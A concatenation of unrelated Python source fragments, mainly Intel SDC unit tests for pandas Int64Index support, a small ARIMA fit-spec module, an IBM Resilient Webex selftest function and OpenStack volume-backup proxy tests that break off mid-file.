        subpeak_file='{}/mock_regions.bed'.format(TEST_FILES_DIR),
    )

    # Parse the second tab-separated column (the score) of each output line.
    scores = []
    with open(os.path.join(TEST_DIR, 'test_CLIQUE_SCORES_DEGREE.txt')) as infile:
        for line in infile:
            scores.append(float(line.split('\t')[1].strip('\n')))

    # Expected values differ between Python 2 and 3 — presumably because the
    # output file stores repr()'d floats, whose precision changed; confirm.
    if (sys.version_info > (3, 0)):
        test_scores = [8.25, 8.0, 7.75, 7.333333333333333]
    else:
        test_scores = [8.25, 8.0, 7.75, 7.33333333333]

    assert scores == test_scores, 'Clique scores do not match!'
python
import os
from collections import namedtuple
from typing import List, TypedDict

from numpy.lib.arraysetops import isin  # noqa: F401  (unused here; kept in case other modules import it from here)

#: Remote location where published ARIMA model fits are hosted.
FIT_URL = 'https://raw.githubusercontent.com/notemptylist/shinko/main/modelfits/arima/'
#: Local directory holding the ARIMA fit files.
FIT_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'modelfits', 'arima')

#: Legacy tuple form of a fit specification.
FitSpec = namedtuple('FitSpec', ['stream', 'numlags', 'todo', 'results', 'tstamp'])

#: Schema version stamped into every spec dict.
fitspec_version = '0.1'


class fitresult(TypedDict):
    """Outcome of fitting one ARIMA order to a stream."""
    order: tuple
    rmse: float
    mean: float
    tstamp: float


class fitspec(TypedDict):
    """A fitting job: the stream to fit, orders left to try, and results.

    BUG FIX: the ``version`` key was missing from this TypedDict even though
    ``make_spec()`` and every producer in this module include it.
    """
    stream: str
    numlags: int
    todo: List[tuple]
    results: List[fitresult]
    version: str


def make_spec() -> fitspec:
    """Return an empty fitspec stamped with the current schema version."""
    s: fitspec = {'stream': '',
                  'numlags': 0,
                  'todo': [],
                  'results': [],
                  'version': fitspec_version
                  }
    return s


if __name__ == "__main__":
    # Round-trip demo: serialize a populated spec to JSON and load it back.
    import json
    fs: fitspec = {'stream': 'foo.json',
                   'numlags': 400,
                   'todo': [(0, 0, 1), (1, 6, 0)],
                   'results': [
                       {'order': (1, 1, 1),
                        'rmse': .90,
                        'mean': .20,
                        'tstamp': 12312312312
                        },
                   ],
                   'version': fitspec_version
                   }
    print(fs)
    print(isinstance(fs, dict))
    with open('foo.json', 'w') as fp:
        json.dump(fs, fp)
    with open('foo.json', 'r') as fp:
        foo = json.load(fp)
    print(foo)
    print(isinstance(foo, dict))
python
import os v = os.environ.get('SOME_KEY') if v.<caret>
python
# -*- coding: utf-8 -*- # ***************************************************************************** # Copyright (c) 2020, Intel Corporation All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; # OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
# *****************************************************************************

import numba
import numpy as np
import pandas as pd
import unittest
from itertools import (combinations_with_replacement, product, )

from sdc.tests.indexes.index_datagens import (
    test_global_index_names,
    _generate_valid_int64_index_data,
    _generate_int64_indexes_fixed,
    get_sample_index,
)
from sdc.tests.test_base import TestCase
from sdc.datatypes.indexes import *


class TestInt64Index(TestCase):
    """Tests for SDC's native pd.Int64Index support.

    The common pattern is: compile a small pyfunc with self.jit, run both the
    compiled and the interpreted version on the same inputs, and assert that
    results (and, where relevant, data-buffer identity) match pandas.
    """

    def test_int64_index_type_inferred(self):
        # typeof() on a boxed pandas Int64Index must map to Int64IndexType
        for data in _generate_valid_int64_index_data():
            for name in test_global_index_names:
                index = pd.Int64Index(data, name=name)
                with self.subTest(index=index):
                    native_index_type = numba.typeof(index)
                    self.assertIsInstance(native_index_type, Int64IndexType)

    def test_int64_index_create_and_box(self):
        def test_impl(data, name):
            return pd.Int64Index(data, name=name)
        sdc_func = self.jit(test_impl)

        name = 'index'
        for data in _generate_valid_int64_index_data():
            with self.subTest(index_data=data):
                result = sdc_func(data, name)
                result_ref = test_impl(data, name)
                pd.testing.assert_index_equal(result, result_ref)

    def test_int64_index_unbox_and_box(self):
        def test_impl(index):
            return index
        sdc_func = self.jit(test_impl)

        n = 11
        for index in _generate_int64_indexes_fixed(n):
            with self.subTest(index=index):
                result = sdc_func(index)
                result_ref = test_impl(index)
                pd.testing.assert_index_equal(result, result_ref)

    def test_int64_index_create_param_copy_true(self):
        # copy=True must produce an index that does NOT share its data buffer
        def test_impl(arr):
            return pd.Int64Index(arr, copy=True)
        sdc_func = self.jit(test_impl)

        index_data_to_test = [
            np.array([1, 2, 3, 5, 6, 3, 4], dtype=np.int64),
            list(np.array([1, 2, 3, 5, 6, 3, 4], dtype=np.int64)),
            pd.RangeIndex(11),
            pd.Int64Index([1, 2, 3, 5, 6, 3, 4]),
        ]
        for index_data in index_data_to_test:
            with self.subTest(index_data=index_data):
                result = sdc_func(index_data)
                result_ref = test_impl(index_data)
                pd.testing.assert_index_equal(result, result_ref)
                self.assertEqual(result._data is result_ref._data, False)

    def test_int64_index_create_param_copy_default(self):
        # default (copy=False) must reuse the underlying buffer when possible
        def test_impl(arr):
            return pd.Int64Index(arr)
        sdc_func = self.jit(test_impl)

        # only test data that has underlying array that can be referenced
        # and ensure it has int64 dtype as otherwise there will always be a copy
        index_data_to_test = [
            np.array([1, 2, 3, 5, 6, 3, 4], dtype=np.int64),
            pd.Int64Index([1, 2, 3, 5, 6, 3, 4]),
        ]
        for index_data in index_data_to_test:
            with self.subTest(index_data=index_data):
                result = sdc_func(index_data)
                result_ref = test_impl(index_data)
                pd.testing.assert_index_equal(result, result_ref)
                self.assertEqual(result._data is result_ref._data, True)

    def test_int64_index_create_param_dtype(self):
        def test_impl(n, dtype):
            return pd.Int64Index(np.arange(n), dtype=dtype)
        sdc_func = self.jit(test_impl)

        n = 11
        supported_dtypes = [None, np.int64, 'int64', np.int32, 'int32']
        for dtype in supported_dtypes:
            with self.subTest(dtype=dtype):
                result = sdc_func(n, dtype)
                result_ref = test_impl(n, dtype)
                pd.testing.assert_index_equal(result, result_ref)

    def test_int64_index_create_param_dtype_invalid(self):
        # both pandas and SDC must reject non-integer dtypes the same way
        def test_impl(n, dtype):
            return pd.Int64Index(np.arange(n), dtype=dtype)
        sdc_func = self.jit(test_impl)

        n = 11
        invalid_dtypes = ['float', 'uint']
        for dtype in invalid_dtypes:
            with self.subTest(dtype=dtype):
                with self.assertRaises(Exception) as context:
                    test_impl(n, dtype)
                pandas_exception = context.exception

                with self.assertRaises(type(pandas_exception)) as context:
                    sdc_func(n, dtype)
                sdc_exception = context.exception
                self.assertIn(str(sdc_exception), str(pandas_exception))

    def test_int64_index_attribute_dtype(self):
        def test_impl(index):
            return index.dtype
        sdc_func = self.jit(test_impl)

        n = 11
        index = pd.Int64Index(np.arange(n) * 2)
        result = sdc_func(index)
        result_ref = test_impl(index)
        self.assertEqual(result, result_ref)

    def test_int64_index_attribute_name(self):
        def test_impl(index):
            return index.name
        sdc_func = self.jit(test_impl)

        n = 11
        index_data = np.arange(n) * 2
        for name in test_global_index_names:
            with self.subTest(name=name):
                index = pd.Int64Index(index_data, name=name)
                result = sdc_func(index)
                result_ref = test_impl(index)
                self.assertEqual(result, result_ref)

    def test_int64_index_len(self):
        def test_impl(index):
            return len(index)
        sdc_func = self.jit(test_impl)

        n = 11
        index = pd.Int64Index(np.arange(n) * 2, name='index')
        result = sdc_func(index)
        result_ref = test_impl(index)
        self.assertEqual(result, result_ref)

    def test_int64_index_attribute_values(self):
        def test_impl(index):
            return index.values
        sdc_func = self.jit(test_impl)

        for data in _generate_valid_int64_index_data():
            index = pd.Int64Index(data)
            with self.subTest(index_data=data):
                result = sdc_func(index)
                result_ref = test_impl(index)
                np.testing.assert_array_equal(result, result_ref)

    def test_int64_index_contains(self):
        def test_impl(index, value):
            return value in index
        sdc_func = self.jit(test_impl)

        index = pd.Int64Index([1, 11, 2])
        values_to_test = [-5, 15, 1, 11, 5, 6]
        for value in values_to_test:
            with self.subTest(value=value):
                result = sdc_func(index, value)
                result_ref = test_impl(index, value)
                np.testing.assert_array_equal(result, result_ref)

    def test_int64_index_copy(self):
        def test_impl(index, new_name):
            return index.copy(name=new_name)
        sdc_func = self.jit(test_impl)

        for data in _generate_valid_int64_index_data():
            for name, new_name in product(test_global_index_names, repeat=2):
                index = pd.Int64Index(data, name=name)
                with self.subTest(index=index, new_name=new_name):
                    result = sdc_func(index, new_name)
                    result_ref = test_impl(index, new_name)
                    pd.testing.assert_index_equal(result, result_ref)

    def test_int64_index_copy_param_deep(self):
        # deep=True must detach the data buffer, deep=False must share it;
        # compiled behavior is compared against pandas' buffer identity
        def test_impl(index, deep):
            return index.copy(deep=deep)
        sdc_func = self.jit(test_impl)

        index = pd.Int64Index([1, 11, 2])
        for deep in [True, False]:
            with self.subTest(deep=deep):
                result = sdc_func(index, deep)
                result_ref = test_impl(index, deep)
                pd.testing.assert_index_equal(result, result_ref)
                self.assertEqual(
                    result._data is index._data,
                    result_ref._data is index._data
                )

    def test_int64_index_getitem_scalar(self):
        def test_impl(index, idx):
            return index[idx]
        sdc_func = self.jit(test_impl)

        for data in _generate_valid_int64_index_data():
            index = pd.Int64Index(data)
            n = len(index)
            values_to_test = [-n, n // 2, n - 1]
            for idx in values_to_test:
                with self.subTest(index=index, idx=idx):
                    result = sdc_func(index, idx)
                    result_ref = test_impl(index, idx)
                    self.assertEqual(result, result_ref)

    def test_int64_index_getitem_scalar_idx_bounds(self):
        # out-of-bounds positions must raise the same exception type as pandas
        def test_impl(index, idx):
            return index[idx]
        sdc_func = self.jit(test_impl)

        n = 11
        index = pd.Int64Index(np.arange(n) * 2, name='abc')
        values_to_test = [-(n + 1), n]
        for idx in values_to_test:
            with self.subTest(idx=idx):
                with self.assertRaises(Exception) as context:
                    test_impl(index, idx)
                pandas_exception = context.exception

                with self.assertRaises(type(pandas_exception)) as context:
                    sdc_func(index, idx)
                sdc_exception = context.exception
                self.assertIsInstance(sdc_exception, type(pandas_exception))
                self.assertIn("out of bounds", str(sdc_exception))

    def test_int64_index_getitem_slice(self):
        def test_impl(index, idx):
            return index[idx]
        sdc_func = self.jit(test_impl)

        n = 17
        slices_params = combinations_with_replacement(
            [None, 0, -1, n // 2, n, n - 3, n + 3, -(n + 3)],
            2
        )
        for data in _generate_valid_int64_index_data():
            index = pd.Int64Index(data, name='abc')
            for slice_start, slice_stop in slices_params:
                for slice_step in [1, -1, 2]:
                    idx = slice(slice_start, slice_stop, slice_step)
                    with self.subTest(index=index, idx=idx):
                        result = sdc_func(index, idx)
                        result_ref = test_impl(index, idx)
                        pd.testing.assert_index_equal(result, result_ref)

    def test_int64_index_iterator_1(self):
        def test_impl(index):
            res = []
            for i, label in enumerate(index):
                res.append((i, label))
            return res
        sdc_func = self.jit(test_impl)

        index = pd.Int64Index([5, 3, 2, 1, 7, 4])
        result = sdc_func(index)
        result_ref = test_impl(index)
        self.assertEqual(result, result_ref)

    def test_int64_index_iterator_2(self):
        def test_impl(index):
            res = []
            for label in index:
                if not label % 2:
                    res.append(label)
            return res
        sdc_func = self.jit(test_impl)

        index = pd.Int64Index([5, 3, 2, 1, 7, 4])
        result = sdc_func(index)
        result_ref = test_impl(index)
        self.assertEqual(result, result_ref)

    def test_int64_index_nparray(self):
        def test_impl(index):
            return np.array(index)
        sdc_func = self.jit(test_impl)

        n = 11
        index = get_sample_index(n, Int64IndexType)
        result = sdc_func(index)
        result_ref = test_impl(index)
        np.testing.assert_array_equal(result, result_ref)

    def test_int64_index_operator_eq_index(self):
        def test_impl(index1, index2):
            return index1 == index2
        sdc_func = self.jit(test_impl)

        n = 11
        for index1, index2 in product(_generate_int64_indexes_fixed(n), repeat=2):
            with self.subTest(index1=index1, index2=index2):
                result = np.asarray(sdc_func(index1, index2))  # FIXME_Numba#5157: remove np.asarray
                result_ref = test_impl(index1, index2)
                np.testing.assert_array_equal(result, result_ref)

    def test_int64_index_operator_eq_scalar(self):
        def test_impl(A, B):
            return A == B
        sdc_func = self.jit(test_impl)

        n = 11
        A = pd.Int64Index(np.arange(n) * 2)
        scalars_to_test = [0, 22, 13, -5, 4.0]
        # NOTE(review): the swap below rebinds A/B for subsequent loop
        # iterations (after the first swap, A is the scalar) — looks
        # intentional since both orders are still exercised, but confirm.
        for B in scalars_to_test:
            for swap_operands in (False, True):
                if swap_operands:
                    A, B = B, A
                with self.subTest(left=A, right=B):
                    result = np.asarray(sdc_func(A, B))  # FIXME_Numba#5157: remove np.asarray
                    result_ref = test_impl(A, B)
                    np.testing.assert_array_equal(result, result_ref)

    def test_int64_index_operator_eq_nparray(self):
        def test_impl(A, B):
            return A == B
        sdc_func = self.jit(test_impl)

        n = 11
        for A, B in product(
            _generate_int64_indexes_fixed(n),
            map(lambda x: np.array(x), _generate_int64_indexes_fixed(n))
        ):
            for swap_operands in (False, True):
                if swap_operands:
                    A, B = B, A
                with self.subTest(left=A, right=B):
                    result = np.asarray(sdc_func(A, B))  # FIXME_Numba#5157: remove np.asarray
                    result_ref = test_impl(A, B)
                    np.testing.assert_array_equal(result, result_ref)

    def test_int64_index_operator_ne_index(self):
        def test_impl(index1, index2):
            return index1 != index2
        sdc_func = self.jit(test_impl)

        n = 11
        for index1, index2 in product(_generate_int64_indexes_fixed(n), repeat=2):
            with self.subTest(index1=index1, index2=index2):
                result = np.asarray(sdc_func(index1, index2))  # FIXME_Numba#5157: remove np.asarray
                result_ref = test_impl(index1, index2)
                np.testing.assert_array_equal(result, result_ref)

    def test_int64_index_operator_is_nounbox(self):
        # 'is' must reflect object identity for indexes created inside jitted
        # code (i.e. without an unboxing round-trip)
        # positive testcase
        def test_impl_1(data, name):
            index1 = pd.Int64Index(data, name=name)
            index2 = index1
            return index1 is index2

        # negative testcase
        def test_impl_2(data, name):
            index1 = pd.Int64Index(data, name=name)
            index2 = pd.Int64Index(data, name=name)
            return index1 is index2

        index_data = pd.Int64Index([1, 2, 3, 5, 6, 3, 4]).values
        compiled_funcs = [
            (test_impl_1, "same indexes"),
            (test_impl_2, "not same indexes")
        ]
        for pyfuncs, name in product(compiled_funcs, test_global_index_names):
            func, descr = pyfuncs
            sdc_func = self.jit(func)
            with self.subTest(subtest=f"{descr}, name={name}"):
                result = sdc_func(index_data, name)
                result_ref = func(index_data, name)
                expected = True if descr == "same indexes" else False
                self.assertEqual(result, result_ref)
                self.assertEqual(result, expected)

    def test_int64_index_getitem_by_mask(self):
        def test_impl(index, mask):
            return index[mask]
        sdc_func = self.jit(test_impl)

        n = 11
        np.random.seed(0)
        mask = np.random.choice([True, False], n)
        for index in _generate_int64_indexes_fixed(n):
            result = sdc_func(index, mask)
            result_ref = test_impl(index, mask)
            pd.testing.assert_index_equal(result, result_ref)

    def test_int64_index_getitem_by_array(self):
        def test_impl(index, idx):
            return index[idx]
        sdc_func = self.jit(test_impl)

        n, k = 11, 7
        np.random.seed(0)
        idx = np.random.choice(np.arange(n), k)
        for index in _generate_int64_indexes_fixed(n):
            result = sdc_func(index, idx)
            result_ref = test_impl(index, idx)
            pd.testing.assert_index_equal(result, result_ref)

    def test_int64_index_reindex_equal_indexes(self):
        def test_func(index1, index2):
            return index1.reindex(index2)
        sdc_func = self.jit(test_func)

        n = 10
        np.random.seed(0)
        index1 = pd.Int64Index(np.arange(n))
        index2 = pd.Int64Index(np.copy(index1.values))

        result = sdc_func(index1, index2)
        result_ref = test_func(index1, index2)
        # reindex returns (new_index, indexer-array) — compare both parts
        pd.testing.assert_index_equal(result[0], result_ref[0])
        np.testing.assert_array_equal(result[1], result_ref[1])

    def test_int64_index_reindex(self):
        def test_impl(index1, index2):
            return index1.reindex(index2)
        sdc_func = self.jit(test_impl)

        n = 10
        np.random.seed(0)
        index_data = np.arange(n)
        index1 = pd.Int64Index(np.random.choice(index_data, n, replace=False))
        reindex_by = [
            pd.RangeIndex(n + 2),
            pd.RangeIndex(0, n, 2),
            pd.Int64Index(np.random.choice(index_data, n, replace=False)),
            pd.Int64Index(np.random.choice([0, 1, 11, 12, 100], n))
        ]
        for index2 in reindex_by:
            with self.subTest(index2=index2):
                result = sdc_func(index1, index2)
                result_ref = test_impl(index1, index2)
                pd.testing.assert_index_equal(result[0], result_ref[0])
                np.testing.assert_array_equal(result[1], result_ref[1])

    def test_int64_index_equals(self):
        def test_impl(index1, index2):
            return index1.equals(index2)
        sdc_func = self.jit(test_impl)

        n = 11
        indexes_to_test = [
            pd.Int64Index(np.arange(n)),
            pd.Int64Index(np.arange(n), name='asd'),
            pd.Int64Index(np.arange(n) * 2, name='asd'),
            pd.Int64Index(np.arange(2 * n)),
        ]
        for index1, index2 in combinations_with_replacement(indexes_to_test, 2):
            with self.subTest(index1=index1, index2=index2):
                result = sdc_func(index1, index2)
                result_ref = test_impl(index1, index2)
                self.assertEqual(result, result_ref)

    def test_int64_index_ravel(self):
        def test_impl(index):
            return index.ravel()
        sdc_func = self.jit(test_impl)

        n = 11
        index = pd.Int64Index(np.arange(n) * 2)
        result = sdc_func(index)
        result_ref = test_impl(index)
        np.testing.assert_array_equal(result, result_ref)

    def test_int64_index_take(self):
        def test_impl(index, value):
            return index.take(value)
        sdc_func = self.jit(test_impl)

        n = 11
        np.random.seed(0)
        index_pos = np.arange(n)
        # positions given as ndarray, list, RangeIndex and Int64Index
        values_to_test = [
            np.random.choice(index_pos, 2*n),
            list(np.random.choice(index_pos, n, replace=False)),
            pd.RangeIndex(n // 2),
            pd.Int64Index(index_pos[n // 2:])
        ]
        for index, value in product(_generate_int64_indexes_fixed(n), values_to_test):
            with self.subTest(index=index, value=value):
                result = sdc_func(index, value)
                result_ref = test_impl(index, value)
                pd.testing.assert_index_equal(result, result_ref)

    def test_int64_index_append(self):
        def test_impl(index, other):
            return index.append(other)
        sdc_func = self.jit(test_impl)

        n = 11
        other_indexes = [
            get_sample_index(n, PositionalIndexType),
            get_sample_index(n, RangeIndexType),
            get_sample_index(n, Int64IndexType),
        ]
        for index, other in product(
                _generate_int64_indexes_fixed(n),
                other_indexes):
            with self.subTest(index=index, other=other):
                result = sdc_func(index, other)
                result_ref = test_impl(index, other)
                pd.testing.assert_index_equal(result, result_ref)

    def test_int64_index_join(self):
        def test_impl(index, other):
            return index.join(other, 'outer', return_indexers=True)
        sdc_func = self.jit(test_impl)

        n = 11
        other_indexes = [
            get_sample_index(2 * n, PositionalIndexType),
            get_sample_index(2 * n, RangeIndexType),
            get_sample_index(2 * n, Int64IndexType),
        ]
        for index, other in product(
                _generate_int64_indexes_fixed(n),
                other_indexes):
            with self.subTest(index=index, other=other):
                result = sdc_func(index, other)
                result_ref = test_impl(index, other)
                # check_names=False, since pandas behavior is not type-stable
                pd.testing.assert_index_equal(result[0], result_ref[0], check_names=False)
                np.testing.assert_array_equal(result[1], result_ref[1])
                np.testing.assert_array_equal(result[2], result_ref[2])


if __name__ == "__main__":
    unittest.main()
python
# (c) Copyright IBM Corp. 2010, 2021. All Rights Reserved.
# -*- coding: utf-8 -*-
# pragma pylint: disable=unused-argument, no-self-use

"""Function implementation"""

import datetime
import logging

from resilient_lib import validate_fields, RequestsCommon
from fn_create_webex_meeting.lib.cisco_api import WebexAPI

PACKAGE_NAME = "fn_create_webex_meeting"

# Configure the module logger exactly once. The original file ran this setup
# twice, attaching two StreamHandlers and duplicating every log line.
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
log.addHandler(logging.StreamHandler())


def selftest_function(opts):
    """
    Verify Webex API connectivity by scheduling a short test meeting.

    :param opts: app configuration dict; the section keyed by PACKAGE_NAME
        must contain webex_email, webex_password, webex_site_url and
        webex_timezone (validated below).
    :return: dict with "state" ("success"/"failure") and a "reason" string
    """
    options = opts.get(PACKAGE_NAME, {})
    required_fields = ["webex_email", "webex_password", "webex_site_url", "webex_timezone"]
    validate_fields(required_fields, options)

    # Build the parameter dict the WebexAPI wrapper expects.
    opts = dict()
    opts["rc"] = RequestsCommon(opts, options)
    opts["webex_site_url"] = options.get("webex_site_url")
    opts["email"] = options.get("webex_email")
    opts["password"] = options.get("webex_password")
    opts["sitename"] = options.get("webex_site")
    opts["timezone"] = options.get("webex_timezone")
    opts["meeting_password"] = "Selftest23#"
    opts["meeting_name"] = "SelfTest Meeting"
    opts["meeting_agenda"] = "Agenda"

    # compute meeting start/end time for 1 day in the future (in epoch)
    now = datetime.datetime.utcnow()
    meeting_start = now + datetime.timedelta(days=1)
    meeting_end = meeting_start + datetime.timedelta(minutes=10)
    # WebexAPI takes start/end as epoch milliseconds
    webex_meeting_start_time = int(meeting_start.timestamp() * 1000)
    webex_meeting_end_time = int(meeting_end.timestamp() * 1000)

    try:
        webex = WebexAPI(opts, webex_meeting_start_time, webex_meeting_end_time)
        response = webex.create_meeting()
        if response.get("status") == "SUCCESS":
            return {"state": "success", "reason": "success"}
        else:
            return {"state": "failure", "reason": response.get("fail_reason")}
    except Exception as err:
        # str(err): the original returned the exception object itself, which
        # serializes poorly in the selftest result payload.
        return {"state": "failure", "reason": str(err)}
python
# Copyright (C) 2016 Intel Corporation # # SPDX-License-Identifier: MIT from .pip import Pip class IDP201700(Pip): _python_path = '/miniconda3/envs/idp2017.0.0/bin/python'
python
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack.tests.unit.test_proxy_base3 import BaseProxyTestCase
from openstack.volume_backup.v2 import _proxy
from openstack.volume_backup.v2 import backup as _backup
from openstack.volume_backup.v2 import backup_policy as _backup_policy
from openstack.volume_backup import volume_backup_service


class TestVolumeBackupProxy(BaseProxyTestCase):
    """Base fixture wiring the VBS proxy/service into the mock session."""

    def __init__(self, *args, **kwargs):
        super(TestVolumeBackupProxy, self).__init__(
            *args,
            proxy_class=_proxy.Proxy,
            service_class=volume_backup_service.VolumeBackupService,
            **kwargs)


class TestCloudBackup(TestVolumeBackupProxy):
    """Proxy tests for backup CRUD: verify the HTTP call made against the
    mocked session and how the mocked response is materialized."""

    def __init__(self, *args, **kwargs):
        super(TestCloudBackup, self).__init__(*args, **kwargs)

    def test_create_backup(self):
        self.mock_response_json_values({
            "id": "70a599e0-31e7-49b7-b260-868f441e862b"
        })

        data = {
            "name": "backup1",
            "volume_id": "c68ae7fb-0aa5-4a97-ab01-ed02c5b7e768",
            "description": "Backups_Demon"
        }
        job = self.proxy.create_backup(**data)

        # keyword args must be wrapped under a top-level "backup" key
        expect_post_json = {
            "backup": {
                "volume_id": "c68ae7fb-0aa5-4a97-ab01-ed02c5b7e768",
                "name": "backup1",
                "description": "Backups_Demon"
            }
        }
        self.assert_session_post_with("/cloudbackups", json=expect_post_json)
        self.assertIsInstance(job, _backup.CloudBackup)
        self.assertEqual("70a599e0-31e7-49b7-b260-868f441e862b", job.job_id)

    def test_create_native_backup(self):
        self.mock_response_json_file_values(
            "create_native_backup_response.json")

        data = {
            "volume_id": "c68ae7fb-0aa5-4a97-ab01-ed02c5b7e768",
            "snapshot_id": "2bb856e1-b3d8-4432-a858-09e4ce939389",
            "name": "backup1",
            "description": "Backup_Demo"
        }
        backup = self.proxy.create_native_backup(**data)

        expect_post_json = {
            "backup": {
                "volume_id": "c68ae7fb-0aa5-4a97-ab01-ed02c5b7e768",
                "snapshot_id": "2bb856e1-b3d8-4432-a858-09e4ce939389",
                "name": "backup1",
                "description": "Backup_Demo"
            }
        }
        self.assert_session_post_with("/backups", json=expect_post_json)
        self.assertIsInstance(backup, _backup.Backup)
        self.assertEqual("54ba0e69-48a0-4a77-9cdf-a7979a7e2648", backup.id)
        self.assertEqual("backup1", backup.name)

    def test_delete_backup_with_id(self):
        self.proxy.delete_backup("some-backup-id")
        self.assert_session_delete("backups/some-backup-id")

    def test_delete_backup_with_instance(self):
        self.proxy.delete_backup(_backup.Backup(id="some-backup-id"))
        self.assert_session_delete("backups/some-backup-id")

    def test_restore_backup(self):
        self.mock_response_json_values({
            "id": "70a599e0-31e7-49b7-b260-868f441e862b"
        })

        job = self.proxy.restore_backup(
            "some-backup-id", "c96e4a94-927a-425c-8795-63f9964cfebd")

        expect_post_json = {
            "restore": {
                "volume_id": "c96e4a94-927a-425c-8795-63f9964cfebd"
            }
        }
        self.assert_session_post_with(
            "cloudbackups/some-backup-id/restore", json=expect_post_json)
        self.assertIsInstance(job, _backup.CloudBackup)
        self.assertEqual("70a599e0-31e7-49b7-b260-868f441e862b", job.job_id)

    def test_list_backup(self):
        query = {
            "name": "some-backup",
            "status": "available",
            "volume_id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319",
            "limit": 10
        }
        self.mock_response_json_file_values("list_backups.json")
        backups = list(self.proxy.backups(**query))

        transferred_query = {
            "name": "some-backup",
            "status": "available",
            "volume_id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319",
            "limit": 10
        }
        self.assert_session_list_with("/backups", params=transferred_query)
        self.assertEqual(2, len(backups))
        backup = backups[0]
        self.assertEqual("1d1139d8-8989-49d3-8aa1-83eb691e6db2", backup.id)
        self.assertIsNone(backup.name)

    def test_list_backup_detail(self):
        query = {
            "name": "some-backup",
            "status": "available",
            "volume_id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319",
            "limit": 10
        }
        self.mock_response_json_file_values("list_backup_details.json")
        # details=True switches the listing to the /backups/detail endpoint
        backups = list(self.proxy.backups(details=True, **query))

        transferred_query = {
            "name": "some-backup",
            "status": "available",
            "volume_id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319",
            "limit": 10
        }
        self.assert_session_list_with("/backups/detail",
                                      params=transferred_query)
        self.assertEqual(3, len(backups))
        backup = backups[0]
        self.assertIsInstance(backup, _backup.BackupDetail)
        self.assertEqual("error", backup.status)
        self.assertIsNone(backup.description)
        self.assertIsNone(backup.availability_zone)
        self.assertEqual("2748f2f2-4394-4e6e-af8d-8dd34496c024",
                         backup.volume_id)
        self.assertEqual(("Connection to swift failed: "
                          "[Errno 111] ECONNREFUSED"), backup.fail_reason)
        self.assertEqual("1d1139d8-8989-49d3-8aa1-83eb691e6db2", backup.id)
        self.assertEqual(1, backup.size)
        self.assertIsNone(backup.object_count)
        self.assertEqual("volumebackups", backup.container)
        self.assertIsNone(backup.name)
        self.assertEqual("2013-06-27T08:48:03.000000", backup.created_at)
        self.assertEqual("b23b579f08c84228b9b4673c46f0c442",
                         backup.tenant_id)

    def test_get_backup(self):
        self.mock_response_json_file_values("get_backup.json")
        backup = self.proxy.get_backup("backup-id")
        self.session.get.assert_called_once_with(
            "backups/backup-id",
            endpoint_filter=self.service,
            endpoint_override=self.service.get_endpoint_override(),
        )
        self.assertIsInstance(backup, _backup.Backup)
        self.assertEqual("error", backup.status)
        self.assertIsNone(backup.description)
        self.assertIsNone(backup.availability_zone)
        self.assertEqual("2748f2f2-4394-4e6e-af8d-8dd34496c024",
                         backup.volume_id)
        self.assertEqual(("Connection to swift failed: "
                          "[Errno 111] ECONNREFUSED"), backup.fail_reason)
        self.assertEqual("1d1139d8-8989-49d3-8aa1-83eb691e6db2", backup.id)
        self.assertEqual(1, backup.size)
        self.assertIsNone(backup.object_count)
        self.assertEqual("volumebackups", backup.container)
        self.assertIsNone(backup.name)
        self.assertEqual("2013-06-27T08:48:03.000000", backup.created_at)
        self.assertEqual("b23b579f08c84228b9b4673c46f0c442",
                         backup.tenant_id)


class TestBackupPolicy(TestVolumeBackupProxy):
    """Proxy tests for backup-policy management and policy/resource binding."""

    def __init__(self, *args, **kwargs):
        super(TestBackupPolicy, self).__init__(*args, **kwargs)

    def test_list_backup_policy(self):
        self.mock_response_json_file_values("list_backup_policies.json")

        policies = list(self.proxy.backup_policies())

        self.assert_session_list_with("/backuppolicy", params={})
        self.assertEqual(2, len(policies))
        policy = policies[0]
        self.assertIsInstance(policy, _backup_policy.BackupPolicy)
        self.assertEqual("XX", policy.id)
        self.assertEqual("plan01", policy.name)
        self.assertEqual(0, policy.policy_resource_count)
        scheduled_policy = policy.scheduled_policy
        self.assertIsInstance(scheduled_policy, _backup_policy.SchedulePolicy)
        self.assertEqual(False,
                         scheduled_policy.remain_first_backup_of_curMonth)
        self.assertEqual(10, scheduled_policy.rentention_num)
        self.assertEqual(1, scheduled_policy.frequency)
        self.assertEqual("12:00", scheduled_policy.start_time)
        self.assertEqual("ON", scheduled_policy.status)
        self.assertTrue(policies[1].scheduled_policy
                        .remain_first_backup_of_curMonth)

    def test_create_backup_policy(self):
        self.mock_response_json_values({
            "backup_policy_id": "af8a20b0-117d-4fc3-ae53-aa3968a4f870"
        })

        scheduled_policy = {
